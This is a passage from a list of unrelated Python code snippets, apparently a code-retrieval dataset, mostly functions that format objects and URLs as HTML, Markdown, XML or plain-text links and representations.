generate_link(resources):\n\n links = \"\"\n for i, resource in enumerate(resources):\n link = \"<\" + resource[\"path\"] + \">\"\n if \"parameters\" in resource:\n for parameter in resource[\"parameters\"]:\n link += \";\" + str(parameter) + \"=\" + str(resource[\"parameters\"][parameter])\n links += link\n if i != len(resources) - 1:\n links += \",\"\n return links", "def pretty(self, **kwargs):\r\n raise NotImplementedError", "def gen_links(text):\n return []", "def deriveLinkfromObject(obj, scale=1, parent_link=True, parent_objects=True,\n reparent_children=True, nameformat='', scaleByBoundingBox=False):\n log('Deriving link from ' + nUtils.getObjectName(obj), level=\"INFO\")\n # create armature/bone\n bUtils.toggleLayer('link', True)\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.armature_add()\n newlink = bpy.context.active_object\n newlink.name = obj.name + \"_link\"\n newlink.matrix_world = obj.matrix_world\n newlink.phobostype = 'link'\n if scaleByBoundingBox:\n bound_box = (\n max([c[0] for c in obj.bound_box]),\n max([c[1] for c in obj.bound_box]),\n max([c[2] for c in obj.bound_box]),\n )\n newlink.scale = [max(bound_box)*scale] * 3\n else:\n newlink.scale = [scale] * 3\n if obj.parent is not None and parent_link:\n eUtils.parentObjectsTo(newlink, obj.parent)\n if parent_objects:\n eUtils.parentObjectsTo(obj, newlink)\n if reparent_children:\n eUtils.parentObjectsTo(list(obj.children), newlink)\n if bpy.context.scene.phoboswireframesettings.links:\n newlink.display_type = \"WIRE\"\n return newlink", "def getLink(self):", "def _format(self):\n output = f\"\\n{color('>>> DUMP')} from {self.filename}: {color(f'L{self.line}')} in {color(f'{self.method}()')}\"\n\n for name, obj in self.objects.items():\n output += f\"\\n\\n{color(f' - {name}:')}\\n\"\n output += f\" {pformat(obj, width=110, indent=4)}\"\n\n output += color(\"\\n\\n<<< END\")\n return output", "def format(self):\n ...", "def format_element(bfo, links=\"no\", category=\"yes\", mirrors=\"yes\"):\n\n arxiv=get_arxiv(bfo, category=\"no\")\n\n if len(arxiv) == 0:\n return\n\n out = ''\n if links == 'yes':\n arxiv_ref = arxiv[0] # Take only first one\n out += '''\n<a href=\"http://arXiv.org/abs/%(ref)s\">Abstract</a> and\n<a href=\"http://arXiv.org/ps/%(ref)s\">Postscript</a>\n and <a href=\"http://arXiv.org/pdf/%(ref)s\">PDF</a> from arXiv.org'''% \\\n {'ref': arxiv_ref}\n\n if mirrors.lower()=='yes':\n out+='''\n (mirrors:\n<a href=\"http://au.arXiv.org/abs/%(ref)s\">au</a>\n\n<a href=\"http://br.arXiv.org/%(ref)s\">br</a>\n<a href=\"http://cn.arXiv.org/abs/%(ref)s\">cn</a>\n<a href=\"http://de.arXiv.org/abs/%(ref)s\">de</a>\n<a href=\"http://es.arXiv.org/abs/%(ref)s\">es</a>\n<a href=\"http://fr.arXiv.org/abs/%(ref)s\">fr</a>\n<a href=\"http://il.arXiv.org/abs/%(ref)s\">il</a>\n<a href=\"http://in.arXiv.org/abs/%(ref)s\">in</a>\n<a href=\"http://it.arXiv.org/abs/%(ref)s\">it</a>\n<a href=\"http://jp.arXiv.org/abs/%(ref)s\">jp</a>\n<a href=\"http://kr.arXiv.org/abs/%(ref)s\">kr</a>\n<a href=\"http://ru.arXiv.org/abs/%(ref)s\">ru</a>\n<a href=\"http://tw.arXiv.org/abs/%(ref)s\">tw</a>\n<a href=\"http://uk.arXiv.org/abs/%(ref)s\">uk</a>\n<a href=\"http://aps.arXiv.org/abs/%(ref)s\">aps</a>\n<a href=\"http://lanl.arXiv.org/abs/%(ref)s\">lanl</a>)''' % \\\n {'ref': arxiv_ref}\n\n\n else: # print only value\n out = ', '.join(get_arxiv(bfo,category))\n\n return out", "def __str__(self, printODData = False):\n networkStr = \"Link\\tFlow\\tCost\\n\"\n for ij in sorted(self.link, key=lambda ij : self.link[ij].sortKey):\n networkStr += \"%s\\t%f\\t%f\\n\" % (ij, self.link[ij].flow, self.link[ij].cost)\n if printODData == True:\n networkStr += \"\\n\"\n networkStr += \"OD pair\\tDemand\\tLeastCost\\n\"\n for ODpair in self.ODpair:\n networkStr += \"%s\\t%f\\t%f\\n\" % (ODpair, self.ODpair[ODpair].demand, self.ODpair[ODpair].leastCost)\n return networkStr", "def detail_link(db_obj, text=None):\n\n def build_link(obj):\n name = str(obj) if text is None else text\n return _make_link(obj.detail_url(), name)\n\n return mark_safe(', '.join(map(build_link, as_list(db_obj))))", "def undo_format_link_segment(value):\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def pybb_link(object, anchor=''):\n\n url = hasattr(object, 'get_absolute_url') and object.get_absolute_url() or None\n #noinspection PyRedeclaration\n anchor = anchor or smart_text(object)\n return mark_safe('<a href=\"%s\">%s</a>' % (url, escape(anchor)))", "def _generate_links(self):\n index = 0\n links = \"\"\n for ch in self.text:\n if ch == '[':\n links += \"(^\"\n elif ch == ']':\n links += \")$|\"\n index += 1\n elif links[-1:] != '|' and links != \"\":\n links += ch\n self.links = compile(links[:-1].lower())", "def exportLineageLink(fromObject, toObject, linkType, csvFile):\n # TODO: add error checking\n row = [linkType, \"\", \"\", fromObject, toObject]\n csvFile.writerow(row)\n return", "def __str__(self) -> str:\n obj_dict: Dict[str, Any] = {}\n obj_dict[\"doc\"] = self.doc\n obj_dict[\"type\"] = self.type\n obj_dict[\"name\"] = self.name\n\n line_range = self.line_range()\n obj_dict[\"start_line\"] = line_range[0]\n obj_dict[\"end_line\"] = line_range[1]\n\n obj_dict[\"children\"] = []\n\n for child in self.children.values():\n obj_dict[\"children\"].append(json.loads(str(child)))\n\n return json.dumps(obj_dict)", "def format_element(bfo, style, separator='; ', elec_loc_field='1'):\n\n urls = []\n coll = bfo.field('960__a')\n\n if '1' in elec_loc_field:\n urls = bfo.fields('8564_')\n\n if '2' in elec_loc_field:\n urls.extend(bfo.fields('85642'))\n\n out = []\n\n if style != \"\":\n style = 'class=\"'+style+'\"'\n\n for url in urls:\n if coll in ['31', '32'] and \\\n url.get('x', '') == 'map':\n # Periodicals\n continue\n\n elif coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n continue\n\n\n elif url.has_key('u'):\n\n label = url.get('y', '')\n if coll in ['60', '61', '62', '63', '69'] or \\\n coll in ['81', '82', '83', '84', '86','87','88', '89', '115', '117']:\n # Council documents +\n # Photos\n label = escape(url.get('z', ''))\n if label.lower() in ['', 'access to fulltext document', 'access to document', 'full text']:\n label = \"Fulltext\"\n if label.lower() in ['audio files']:\n label = '<img src=http://cdsweb.cern.ch/img/speaker.png border=\"0\">' + \\\n label\n\n\n link = '<a ' + style + ' href=\"' + url['u'] + '\">' + \\\n label + '</a>'\n out.append(link)\n\n if coll == '05':\n file_numbers = bfo.field('927__a')\n for file_number in file_numbers:\n if '-' in file_number or '_' in file_number:\n link = '<a href=\"http://doc.cern.ch/cgi-bin/setlink?base=pauli&amp;categ=&amp;id=\"%s\">Fulltext</a>' % file_number\n out.append(link)\n\n if coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n link = 'Published in <a href=\"http://bulletin.cern.ch/eng/bulletin.php?bullno=' + \\\n bfo.field('088__a') +'\">CERN weekly bulletin ' + bfo.field('088__a') + '</a>' + \\\n ' (' + bfo.field('260__c') + ')'\n out.append(link)\n\n return separator.join(out)", "def render(links, enum=False):\n if not enum:\n return \"\\n\".join(links)\n return \"\\n\".join(\"%s. %s\" % ((i + 1), l) for i, l in enumerate(links))", "def htmlize(self, obj, rooturl):\n\n\t\tif isinstance(obj, basestring):\n\t\t\tif obj.startswith(\"@\"):\n\n\t\t\t\t# Button link...\n\t\t\t\ttry:\n\t\t\t\t\tmod, ns, objid, value = obj[1:].split(\":\")\n\t\t\t\texcept ValueError:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\ttarget_url = rooturl + mod + \"/\" + ns + \"/\" + objid\n\t\t\t\t\tfl = \"<form method=\\\"post\\\" action=\\\"\" + cgi.escape(target_url, True)\n\t\t\t\t\tfl += \"\\\"><input type=\\\"submit\\\" name=\\\"cmd\\\" value=\\\"\"\n\t\t\t\t\tfl += cgi.escape(value, True) + \"\\\"/></form>\"\n\t\t\t\t\treturn fl\n\n\t\t\tif obj == '':\n\t\t\t\treturn \"<br/>\"\n\n\t\t\treturn cgi.escape(obj)\n\n\t\tif isinstance(obj, list):\n\t\t\tout = \"</li><li>\".join(self.htmlize(item, rooturl) for item in obj)\n\t\t\treturn \"<ul><li>\" + out + \"</li></ul>\"\n\n\t\tif isinstance(obj, tuple):\n\t\t\tout = \"\".join(self.htmlize(item, rooturl) for item in obj)\n\t\t\treturn out\n\t\t\t#return \"<p>\" + out + \"</p>\"\n\n\t\tif isinstance(obj, dict) or isinstance(obj, weakref.WeakValueDictionary):\n\t\t\tout = \"</li><li>\".join(\n\t\t\t\t\"<b>\" + cgi.escape(repr(k)) + \"</b>: \" + self.htmlize(obj[k], rooturl)\n\t\t\t\tfor k\n\t\t\t\tin sorted(obj.iterkeys())\n\t\t\t)\n\t\t\treturn \"<ul><li>\" + out + \"</li></ul>\"\n\n\t\tif hasattr(obj, '_chiral_introspect') \\\n\t\t and hasattr(obj._chiral_introspect, 'im_self') \\\n\t\t and obj._chiral_introspect.im_self is not None:\n\t\t\treturn \"<a href=\\\"\" + cgi.escape(\n\t\t\t\trooturl + obj._chiral_introspect.__module__ + (\"/%s/%s\" % obj._chiral_introspect())\n\t\t\t) + \"\\\">\" + cgi.escape(repr(obj)) + \"</a>\"\n\n\t\treturn \"<i>\" + cgi.escape(repr(obj)) + \"</i>\"", "def link(self):\n return f\"[{self.numbered_title}]({self.html_url})\"", "def pformat(object):\r\n return PrettyPrinter().pformat(object)", "def links(self):\n return self._links_tpl.expand(self._identity, self._record)", "def _format_to_link(self, commit):\n return os.path.join(self.mount, \"commits-by-hash\", self._hash_updir(commit), commit) + \"/\"", "def formatArrayHyperlink(txt, lnk, filename):\n if oapackage.oahelper.oaIsBinary(filename):\n ss = e.a(txt + e.small(\" (binary)\"), href=lnk, class_=\"binarylink\")\n else:\n ss = e.a(txt, href=lnk, class_=\"normal\")\n return ss", "def __repr__(self):\n\n return '%s(%s)' % (self, self._format_entries(),)", "def get_pretty_links(self, source):\n data = self.get_links(source)\n to_return = []\n for ind in data:\n if ind == '':\n continue\n if len(ind[2]) > 300:\n ind[2] = ind[2][:297] + '...'\n to_return.append([ind[1], ind[2], ind[3][0], ind[3][1]])\n if source == 'twitter':\n to_return[-1].append(ind[3][2])\n return to_return", "def comma_seperated_admin_links(objs):\n anchors = []\n for obj in objs:\n anchors.append('<a href=\"%s\">%s</a>' % (get_obj_admin_path(obj), obj.title))\n return ', '.join(anchors)", "def __str__(self):\n table = 'objects'.join(self.galcat.__str__().split('objects')[1:])\n return self.__repr__()+'\\n'+table", "def url(self):\n if self.term_type != 'C':\n url_fmt = self.path_level_url_fmt\n url_info = {'id': self.term_type}\n else:\n url_fmt = self.obj_level_url_fmt\n url_info = {'org_prefix': self.org_prefix, 'id': self.term_id}\n\n return url_fmt % url_info", "def to_html(obj):\n return highlight(\"json\", json.dumps(obj, sort_keys=False, indent=4))", "def format_link(self):\n self.url = sys.argv[1]\n video_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/watch\\?v=([\\w-]+)')\n playlist_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/playlist\\?list=([\\w-]+)')\n # check if it's a single video link\n if video_link_regex.search(self.url):\n result_regex = video_link_regex.search(self.url)\n self. url = result_regex.group().split('&')[0]\n self.show_formats()\n # check if it's a playlist link\n elif playlist_link_regex.search(self.url):\n logging. debug('Yes it a playlist')\n result_regex = playlist_link_regex.search(self.url)\n playlist_link = result_regex.group().split('&')[0]\n self. get_videos_in_playlist()\n # check if link is not a youtube link\n else:\n logging.debug('Not even a yt link')\n sys. exit()", "def formatted(self) -> str:\r\n ...", "def __repr__ (self):\n\t\t# return (\"%s %s\" % (self.name, self.ppDate (self.modtime)))\t\n\t\tlabel = self.name\n\t\tif self.islink:\n\t\t\tlabel = \"%s (link)\" % label\n\t\tif self.isalias:\n\t\t\tlabel = \"%s (alias)\" % label\n\t\ts = ''\n\t\tif 0:\n\t\t\ts = \"%s%s (%s)\" % (myglobals.getIndent(self.level), \n\t\t\t\t\t\t\t\t self.compactDate (self.modtime),\n\t\t\t\t\t\t\t\t self.name)\n\t\t\ts += \"\\n\\t%s - \"\n\t\ts += \"%s - %s (%s)\" % (self.compactDate(self.firstTime),\n\t\t\t\t\t\t\t\t self.compactDate(self.lastTime),\n\t\t\t\t\t\t\t\t self.compactDate(self.lastLine))\n\t\treturn s;", "def format_value(obj, field_name):\n display_func = getattr(obj, 'get_%s_display' % field_name, None)\n if display_func:\n return display_func()\n value = getattr(obj, field_name)\n\n if isinstance(value, models.fields.files.FieldFile):\n if value:\n return mark_safe('<a href=\"%s\">%s</a>' % (\n value.url,\n os.path.basename(value.name),\n ))\n else:\n return ''\n\n if isinstance(value, models.Model):\n return format_value_instance(value)\n\n if isinstance(value, models.Manager):\n return mark_safe(', '.join(\n [format_value_instance(instance) for instance in value.all()]\n ))\n if value is None:\n value = \"\"\n return value", "def generate_link_kml(self, d):\n return \"\"\"\\\n <NetworkLink>\n <name>%(image_filename)s</name>\n <Region>\n <Lod>\n <minLodPixels>%(minlodpixels)d</minLodPixels>\n <maxLodPixels>-1</maxLodPixels>\n </Lod>\n <LatLonAltBox>\n <north>%(north).14f</north>\n <south>%(south).14f</south>\n <east>%(east).14f</east>\n <west>%(west).14f</west>\n </LatLonAltBox>\n </Region>\n <Link>\n <href>%(link_url)s</href>\n <viewRefreshMode>onRegion</viewRefreshMode>\n </Link>\n </NetworkLink>\"\"\" % d", "def render(objects,\n output_encoding,\n title_force_uppercase,\n msdos_eol_style,\n omit_fields_mapping={}):", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/media/{}'.format(obj.id)\n )", "def format(self, obj):\n return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))", "def _object2style(self, selector, token):\r\n\r\n obj = self._object2style_helper(\"\", token)\r\n # insert items in the order they were found in the document\r\n minify = True\r\n if not minify:\r\n arr = [\" %s: %s;\" % (k, v) for k, v in obj.items()]\r\n body = \"\\n\".join(arr)\r\n return \"%s {\\n%s\\n}\" % (selector, body)\r\n else:\r\n arr = [\"%s:%s\" % (k, v) for k, v in obj.items()]\r\n body = \";\".join(arr)\r\n return \"%s {%s}\" % (selector, body)", "def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += f'\\n {t}'\n format_string += '\\n)'\n return format_string", "def append_links(self, lines, lang):\n lines.append(\"verbatim &nbsp;\")\n lines.append(\"section Links\")\n lines.append(\"external http://polcasaglia.blogspot.com Blog\")\n lines.append(\"external http://www.uisp-fe.it/calcio.php UISP\" )\n lines.append(\"verbatim &nbsp;\")\n return lines", "def reportLink(self, citName, end1, end2):\n assert citName and end1 and end2\n osh = ObjectStateHolder(citName)\n osh.setAttribute(\"link_end1\", end1)\n osh.setAttribute(\"link_end2\", end2)\n return osh", "def to_markdown(self):\n s = \"[\" + self.label + \"]\"\n if self.is_reflink:\n s += \": \" + self.url\n else:\n s += \"(\" + self.url + \")\"\n return s", "def __html__(self) -> str:\n components = [\n self.attributee_html,\n f'\"{self.linked_title}\"',\n self.date.string if self.date else '',\n ]\n return self.components_to_html(components)", "def makeBackrefLink(self, info, g_links, i):\n atts, content, infoid, link = '', '', '', ''\n if 'def' in info:\n link = info['def']['link']\n backlink_type = link or g_links\n i_ = self.encode_high(i)\n allow_inc = i not in self.syms\n i_ = int(i_)\n\n if backlink_type == \"!\":\n return ''\n elif backlink_type == '^':\n return \"\"\"<sup><a href=\"#noteref%s\">%s</a></sup>\"\"\" % (\n info['refids'][0], i\n )\n else:\n result = []\n for refid in info['refids']:\n i_entity = self.decode_high(i_)\n sup = \"\"\"<sup><a href=\"#noteref%s\">%s</a></sup>\"\"\" % (\n refid, i_entity\n )\n if allow_inc:\n i_ += 1\n result.append(sup)\n result = ' '.join(result)\n return result", "def parseDocObjectsToStrings(records, obj_type):\n for doc in records:\n for key, value in doc.items():\n # all dates should look the same\n if isinstance(value, datetime.datetime):\n doc[key] = datetime.datetime.strftime(value,\n \"%Y-%m-%d %H:%M:%S\")\n if key == \"_id\" or key == \"id\":\n doc[\"recid\"] = str(value)\n doc[\"details\"] = \"<a href='\"+getHREFLink(doc, obj_type)+\"'>\"\\\n \"<div class='icon-container'>\"\\\n \"<span class='ui-icon ui-icon-document'></span>\"\\\n \"</div>\"\\\n \"</a>\"\n elif key == \"password_reset\":\n doc['password_reset'] = None\n elif key == \"campaign\":\n camps = []\n for campdict in value:\n camps.append(campdict['name'])\n doc[key] = \"|||\".join(camps)\n elif key == \"source\":\n srcs = []\n for srcdict in doc[key]:\n srcs.append(srcdict['name'])\n doc[key] = \"|||\".join(srcs)\n elif key == \"tags\":\n tags = []\n for tag in doc[key]:\n tags.append(tag)\n doc[key] = \"|||\".join(tags)\n elif key == \"is_active\":\n if value:\n doc[key] = \"True\"\n else:\n doc[key] = \"False\"\n elif key == \"tickets\":\n tickets = []\n for ticketdict in value:\n tickets.append(ticketdict['ticket_number'])\n doc[key] = \"|||\".join(tickets)\n elif key == \"datatype\":\n doc[key] = value.keys()[0]\n elif key == \"to\":\n doc[key] = len(value)\n elif key == \"thumb\":\n doc['url'] = reverse(\"crits.screenshots.views.render_screenshot\",\n args=(unicode(doc[\"_id\"]),))\n elif key==\"results\" and obj_type == \"AnalysisResult\":\n doc[key] = len(value)\n elif isinstance(value, list):\n if value:\n for item in value:\n if not isinstance(item, basestring):\n break\n else:\n doc[key] = \",\".join(value)\n else:\n doc[key] = \"\"\n doc[key] = html_escape(doc[key])\n value = doc[key].strip()\n if isinstance(value, unicode) or isinstance(value, str):\n val = ' '.join(value.split())\n val = val.replace('\"',\"'\")\n doc[key] = val\n return records", "def __str__(self):\n return self.getBooksString() + \"\\n\" + self.getPatronsString()", "def user2Link(user): \n # could also look up mail addrs via a table lookup, etc\n return '<a href=\"mailto:%(user)s@somewebsite.com\">%(user)s</a>' % {\"user\": user}", "def format(self) -> str:", "def format_item_display(self, obj):\n return u\"%s - %s\" % (escape(obj.nombre),obj.rfc)", "def get_links(self, obj):\n request = self.context['request']\n detail_name = '{}-detail'.format(get_model_name(obj.__class__))\n return {\n 'self': reverse(detail_name, kwargs={'pk': obj.pk}, request=request),\n }", "def xml_add_links(cls, data):\n xml = \"\"\n chunk = '<link rel=\"%s\" href=\"%s\" title=\"%s\" />'\n links = data.pop(config.LINKS, {})\n ordered_links = OrderedDict(sorted(links.items()))\n for rel, link in ordered_links.items():\n if rel == \"related\":\n # add data relation links back for\n # future processing of hateoas attributes\n data.update({config.LINKS: {rel: link}})\n\n elif isinstance(link, list):\n xml += \"\".join(\n chunk % (rel, escape(d[\"href\"]), escape(d[\"title\"]))\n for d in link\n )\n else:\n xml += \"\".join(chunk % (rel, escape(link[\"href\"]), link[\"title\"]))\n return xml", "def make_to_string(front, mid, back, empty_repr):\n \"*** YOUR CODE HERE ***\"\n def printer(lnk):\n if lnk == Link.empty:\n return empty_repr\n else:\n return front + str(lnk.first) + mid + printer(lnk.rest) + back\n return printer", "def custom_links(context, obj):\n content_type = ContentType.objects.get_for_model(obj)\n custom_links = CustomLink.objects.filter(content_types=content_type, enabled=True)\n if not custom_links:\n return ''\n\n # Pass select context data when rendering the CustomLink\n link_context = {\n 'object': obj,\n 'debug': context.get('debug', False), # django.template.context_processors.debug\n 'request': context['request'], # django.template.context_processors.request\n 'user': context['user'], # django.contrib.auth.context_processors.auth\n 'perms': context['perms'], # django.contrib.auth.context_processors.auth\n }\n template_code = ''\n group_names = {}\n\n for cl in custom_links:\n\n # Organize custom links by group\n if cl.group_name and cl.group_name in group_names:\n group_names[cl.group_name].append(cl)\n elif cl.group_name:\n group_names[cl.group_name] = [cl]\n\n # Add non-grouped links\n else:\n try:\n rendered = cl.render(link_context)\n if rendered:\n template_code += LINK_BUTTON.format(\n rendered['link'], rendered['link_target'], cl.button_class, rendered['text']\n )\n except Exception as e:\n template_code += f'<a class=\"btn btn-sm btn-outline-dark\" disabled=\"disabled\" title=\"{e}\">' \\\n f'<i class=\"mdi mdi-alert\"></i> {cl.name}</a>\\n'\n\n # Add grouped links to template\n for group, links in group_names.items():\n\n links_rendered = []\n\n for cl in links:\n try:\n rendered = cl.render(link_context)\n if rendered:\n links_rendered.append(\n GROUP_LINK.format(rendered['link'], rendered['link_target'], rendered['text'])\n )\n except Exception as e:\n links_rendered.append(\n f'<li><a class=\"dropdown-item\" disabled=\"disabled\" title=\"{e}\"><span class=\"text-muted\">'\n f'<i class=\"mdi mdi-alert\"></i> {cl.name}</span></a></li>'\n )\n\n if links_rendered:\n template_code += GROUP_BUTTON.format(\n links[0].button_class, group, ''.join(links_rendered)\n )\n\n return mark_safe(template_code)", "def format_url(self, url, text):\r\n return u'<a href=\"%s\">%s</a>' % (escape(url), text)", "def object_view_with_links(obj, request):\n _view = _object_view(obj, request)\n obj_link = obj_ui_link = \"\"\n # UI link to the real business object referenced as topic\n if isinstance(obj, Posting):\n obj_ui_link = request.link(obj, app=get_root(request).child(\"activitystream\"))\n else:\n try:\n obj_link = request.link(obj, app=_get_collection_app(request))\n except morepath.error.LinkError:\n pass\n obj_ui_link = get_ui_link(request, obj) or \"\"\n _view.update({\n \"object_id\": obj_link,\n \"object_ui_link\": obj_ui_link})\n return _view", "def get_links(self):\n links = \"\"\n if self.title != \"\":\n links += html_link_to_tag(\n plain_to_html(self.title), self.title, self.proc\n )\n return links + \\\n html_unordered_list([x.get_links() for x in self.subsections])", "def link_doc(link_source, link_type, links):\n ldoc_id = link_doc_id(link_source, link_type, links)\n curr_time = datetime.datetime.utcnow()\n ldoc = {\n '_id': ldoc_id,\n 'type': 'link',\n 'time': {'year': curr_time.year,\n 'month': curr_time.month,\n 'day': curr_time.day,\n 'iso': curr_time.isoformat()\n },\n 'source': link_source,\n 'link_type': link_type,\n 'links': links\n }\n return ldoc", "def format_item(self,obj):\n return unicode(obj)", "def get_str(self, obj):\n if self.pretty:\n return pprint.pformat(obj)\n else:\n return str(obj)", "def generate_link_attr(d: Dict):\n d.update({\"link\": urljoin(\"https://vdb-kasf1i23nr1kl2j4.rapid7.com/v1/content/\", d.get(\"identifier\"))})", "def output(self):\n entry = []\n entry.append('''<entry>\n <title mode=\"escaped\" type=\"text/html\">%(title)s</title>\n <link rel=\"alternate\" type=\"text/html\" href=\"%(url)s\" />\n <issued>%(issued)s</issued>\n <modified>%(modified)s</modified>\n ''' % self.__dict__)\n \n if self.feed:\n entry.append('''<link rel=\"service.feed\" type=\"application/atom+xml\" href=\"%s\" title=\"%s\" />''' % (self.feed, self.feed_title))\n if self.comments:\n entry.append('''<link rel=\"comments\" type=\"application/atom+xml\" href=\"%s\" />''' % self.comments)\n if self.author:\n entry.append('''<author>%s</author>''' % self.author.output())\n for person in self.contributors:\n entry.append('''<contributor>%s</contributor>''' % person.output())\n if self.id:\n entry.append('''<id>%s</id>''' % self.id)\n if self.created:\n entry.append('''<created>%s</created>''' % self.created)\n if self.summary:\n entry.append('''<summary type=\"application/xhtml+xml\" xml:base=\"%s\" xml:space=\"preserve\">\n <div xmlns=\"http://www.w3.org/1999/xhtml\">%s</div></summary>''' % (self.base_url, self.summary))\n if self.content:\n #entry.append('''<content type=\"application/xhtml+xml\" xml:base=\"%s\" xml:space=\"preserve\">\n # <div xmlns=\"http://www.w3.org/1999/xhtml\">%s</div></content>''' % (self.base_url, self.content))\n entry.append('''<content type=\"text/html\" mode=\"escaped\" xml:base=\"%s\" xml:space=\"preserve\">%s</content>''' % (self.base_url, self.content))\n \n entry.append('''</entry>''')\n return '\\n'.join(entry)", "def formatall(obj):\n result = \"\"\n if isinstance(obj, list):\n# i = 0\n for obj in obj:\n #printf(\">>> [%d] >>> \", i)\n result += format(obj)\n result += \"\\n\"\n# i += 1\n return result\n if isinstance(obj, dict):\n for key, value in obj.items():\n result += \"%-15s : \" % key\n result += format(value)\n result += \"\\n\"\n return result\n return format(obj)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __init__(self, name, attrs={}):\n URLFormat.__init__(self, name, attrs)", "def __repr__(self):\n dbline = ' - {0}'\n fcline = ' + {0}'\n output = ['{0} ({1})'.format(self.name, self.url)]\n output.append('-' * len(output[0]))\n output.append(' {0}'.format(self.mxd))\n for db in self._dbnames:\n output.append(dbline.format(db))\n for fc in sorted(self._datastructure[db]):\n output.append(fcline.format(fc))\n output.append('')\n output.append('')\n return '\\n'.join(output)", "def __repr__(self):\n return pprint.saferepr(self.redirects)", "def make_links(traceback):\r\n\r\n lwords = traceback.split('\"')\r\n\r\n # Making the short circuit compatible with <= python2.4\r\n result = (len(lwords) != 0) and lwords[0] or ''\r\n\r\n i = 1\r\n\r\n while i < len(lwords):\r\n link = make_link(lwords[i])\r\n\r\n if link == '':\r\n result += '\"' + lwords[i]\r\n else:\r\n result += link\r\n\r\n if i + 1 < len(lwords):\r\n result += lwords[i + 1]\r\n i = i + 1\r\n\r\n i = i + 1\r\n\r\n return result", "def prettyformat(self):\n \n import re\n\n html = self.get_htmlsrc()\n if type(html) == type([]):\n html = html[0]\n if type(html) != type(\"\"):\n try:\n html = str(html)\n except:\n html = html.__str__()\n \n tmp = BeautifulSoup(html)\n base = self.target_baseurl()\n# aitems = tmp.findAll(\"a\",href=re.compile(\"^\\/\"))\n aitems = tmp.findAll(\"a\",href=re.compile(\"^[^hH]\"))\n for i in aitems:\n u = i['href']\n if u[0] != '/':\n i['href'] = base + '/' + u\n else: \n i['href'] = base + u\n# imgitems = tmp.findAll(\"img\",src=re.compile(\"^\\/\"))\n imgitems = tmp.findAll(\"img\",src=re.compile(\"^[^hH]\"))\n for j in imgitems:\n v = j['src']\n if v[0] != '/':\n j['src'] = base + '/' + v\n else: \n j['src'] = base + v\n return tmp", "def __str__(self):\n if self.external_form:\n return self.external_form\n if self.url:\n return self.format('url')\n if self.uuid:\n return self.format('uuid')\n return self.format('path')", "def format_link(attrs: Dict[tuple, str], new: bool = False):\n try:\n p = urlparse(attrs[(None, 'href')])\n except KeyError:\n # no href, probably an anchor\n return attrs\n\n if not any([p.scheme, p.netloc, p.path]) and p.fragment:\n # the link isn't going anywhere, probably a fragment link\n return attrs\n\n c = urlparse(settings.SITE_URL)\n if p.netloc != c.netloc:\n # link is external - secure and mark\n attrs[(None, 'target')] = '_blank'\n attrs[(None, 'class')] = attrs.get((None, 'class'), '') + ' external'\n attrs[(None, 'rel')] = 'nofollow noopener noreferrer'\n\n return attrs", "def getExpandedLinks():", "def link_the_references(obj, path):\n if not obj:\n log.bug(\"obj non è un parametro valido: %s\" % obj)\n return\n\n if not path:\n log.bug(\"path non è un parametro valido: %s\" % path)\n return\n\n # -------------------------------------------------------------------------\n\n for attr_name, attr_value in obj.__dict__.iteritems():\n if attr_name[0] == \"_\" or attr_name in obj.VOLATILES:\n continue\n\n # Cerca eventuali riferimenti da collegare alle istanze nei dati che\n # si rifanno a delle classi con altri attributi (che quindi hanno un\n # modulo da dove reperirle)\n if attr_name in obj.SCHEMA and obj.SCHEMA[attr_name][0]:\n if isinstance(attr_value, list):\n for i, sub_value in enumerate(attr_value):\n sub_path = \"%s.%s[%s]\" % (path, attr_name, i)\n link_the_references(sub_value, sub_path)\n elif isinstance(attr_value, dict):\n for key, sub_value in attr_value.iteritems():\n sub_path = \"%s.%s[%s]\" % (path, attr_name, repr(key))\n link_the_references(sub_value, sub_path)\n elif attr_value:\n link_the_references(attr_value, \"%s.%s\" % (path, attr_name))\n\n # Se la variabile si trova nel dizionario REFERENCES della classe\n # allora probabilmente è un dato precedentemente acquisito come\n # stringa ma che deve essere convertito al riferimento di dato\n elif attr_name in obj.REFERENCES or attr_name in obj.WEAKREFS:\n # La variabile di riferimento può benissimo essere None, già di\n # default è così, significa che non ha trovato nessuna etichetta\n # relativa nel file del dato, questo è normale per etichette\n # facoltative\n if attr_value is None:\n continue\n\n # Se la variabile si trova nel dizionario WEAKREFS della classe\n # si comporta come una variabile relativa alle REFERENCES\n # tuttavia se questa viene rimossa dal gioco il riferimento\n # debole va a mancare automaticamente\n if attr_name in obj.WEAKREFS:\n table_names = obj.WEAKREFS[attr_name]\n else:\n # Le tabelle per la ricerca del riferimento possono essere più\n # d'una, ognuna delle quali però deve possere delle chiavi\n # differenti tra loro (come per esempio il database dei mob\n # e quello degli oggetti)\n table_names = obj.REFERENCES[attr_name]\n\n # Se var è una stringa allora cerca il riferimento tra le tabelle\n if isinstance(attr_value, basestring):\n var = _search_the_reference(attr_name, attr_value, table_names, path)\n if var and attr_name in obj.WEAKREFS:\n setattr(obj, attr_name, weakref.ref(var or None))\n else:\n setattr(obj, attr_name, var or None)\n # Se var è una lista allora deve trovare tutti i riferimenti di\n # ogni elemento che sono identificati da un codice-stringa\n elif type(attr_value) == list:\n new_list = []\n for v in attr_value:\n value = _search_the_reference(attr_name, v, table_names, path)\n if value:\n if attr_name in obj.WEAKREFS:\n new_list.append(weakref.ref(value))\n else:\n new_list.append(value)\n setattr(obj, attr_name, new_list)\n elif type(attr_value) == dict:\n # (TD)\n raise NotImplementedError", "def 